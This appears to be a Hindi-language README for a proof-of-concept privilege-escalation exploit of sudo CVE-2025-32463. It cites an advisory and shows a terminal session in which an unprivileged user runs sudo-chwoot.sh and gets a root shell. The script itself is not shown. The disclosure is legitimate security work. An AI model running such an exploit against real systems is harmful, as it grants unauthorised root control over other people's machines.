
CVE-2025-32463 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो एक अविशेषाधिकार प्राप्त उपयोगकर्ता से चरूटेड वातावरण के बाहर एक रूट शेल तक विशेषाधिकार वृद्धि का प्रदर्शन करता है, एक sudo भेद्यता के माध्यम से।
संदर्भ: https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
Ubuntu 24.04.2 LTS सर्वर पर Sudo v1.9.15p5 के साथ PoC को निष्पादित करने पर, बिना किसी Sudo नियम परिभाषित किए एक अन-प्रिविलेज्ड उपयोगकर्ता का उपयोग करते हुए, chrooted वातावरण के बाहर एक रूट शेल प्राप्त होता है।
lowpriv@prod:/CVE-2025-32463$ id
uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv)
lowpriv@prod:/CVE-2025-32463$ sudo -l
[sudo] password for lowpriv:
Sorry, user lowpriv may not run sudo on prod.
lowpriv@prod:~/CVE-2025-32463$ ./sudo-chwoot.sh
woot!
root@prod:/# id
uid=0(root) gid=0(root) groups=0(root),1001(lowpriv)